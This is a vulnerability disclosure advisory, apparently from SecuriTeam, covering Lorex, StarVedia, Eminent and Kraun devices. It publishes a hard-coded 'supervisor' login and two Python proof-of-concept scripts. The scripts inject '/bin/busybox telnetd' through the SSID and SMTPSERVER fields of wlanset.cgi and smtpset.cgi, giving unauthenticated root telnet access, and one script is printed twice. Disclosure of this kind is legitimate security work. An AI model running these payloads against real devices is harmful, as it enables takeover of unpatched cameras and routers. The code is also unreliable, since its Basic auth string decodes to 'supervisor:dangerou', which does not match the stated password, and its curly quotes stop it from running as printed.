SSD Advisory – Multiple IoT Vendors – Multiple Vulnerabilities

February 8, 2018 admin Hard-Coded Password, Remote Command Execution, SecuriTeam Secure Disclosure

Credit to Author: SSD / Maor Schwartz| Date: Thu, 08 Feb 2018 08:02:43 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope

Vulnerabilities summary
The following advisory describes three (3) vulnerabilities found in the following vendors:

Lorex
StarVedia
Eminent
Kraun

The vulnerabilities found:

Hard-coded credentials
Remote command injection (2)

It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution.

Credit
An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported this vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response
We tried to contact Lorex, Kraun and Eminent, attempts to establish contact went unanswered, therefore no details have been provided on a solution or a workaround.

StarVedia were informed of the vulnerabilities and released patches to address them – “These two issues were fixed before your contacting us”

Vulnerabilities details
Hard-coded credentials
Default users that can be used to log in in the router’s website is: “supervisor”, with the password “dangerous”

Remote command injection (1)
User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to wlanset.cgi with malicious ‘SSID’ parameter.

Proof of Concept

 #!/usr/bin/python  import requests  import os  import time    print “Unauthenticated Remote Code Execution”    url = ‘http://VICTIM-IP/cgi-bin/wlanset.cgi’ # Adjust IP address  payload = {‘WiFiEnable’: ‘1’,’SSID’:’`/bin/busybox telnetd`’,’SECUNONE’:’1′,’WIFITEST’:’WiFi+test’}  headers = { “Authorization”: “Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==”, “Content-type”: “application/x-www-form-urlencoded”}    r = requests.post(url, data=payload, headers=headers)  time.sleep(5)    print “nTry to connect to your target via telnet and use the user name root.”

Remote command injection (2)
User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to smtpset.cgi with malicious ‘SMTPSERVER’ parameter.

Proof of Concept

 #!/usr/bin/python  import requests  import os  import time    print “Unauthenticated Remote Code Execution”    url = ‘http://VICTIM-IP/cgi-bin/smtpset.cgi’ # Adjust IP address  payload = {‘UseUserDefined’: ‘1’,’SMTPSERVER’:’`/bin/busybox telnetd`’,’SMTPPORT’:’25’,’SMTPNAME’:”,’SMTPPASSWD’:”,’SMTPTEST’:’SMTP+server+test’}  headers = { “Authorization”: “Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==”, “Content-type”: “application/x-www-form-urlencoded”}    r = requests.post(url, data=payload, headers=headers)  time.sleep(5)    print “nTry to connect to your target via telnet and use the user name root.”

#!/usr/bin/python

import requests

import os

import time

print “Unauthenticated Remote Code Execution”

url = ‘http://VICTIM-IP/cgi-bin/smtpset.cgi’ # Adjust IP address

payload = {‘UseUserDefined’: ‘1’,‘SMTPSERVER’:‘`/bin/busybox telnetd`’,‘SMTPPORT’:’25’,‘SMTPNAME’:”,‘SMTPPASSWD’:”,‘SMTPTEST’:‘SMTP+server+test’}

headers = { “Authorization”: “Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==”, “Content-type”: “application/x-www-form-urlencoded”}

r = requests.post(url, data=payload, headers=headers)

time.sleep(5)

print “nTry to connect to your target via telnet and use the user name root.”

https://blogs.securiteam.com/index.php/feed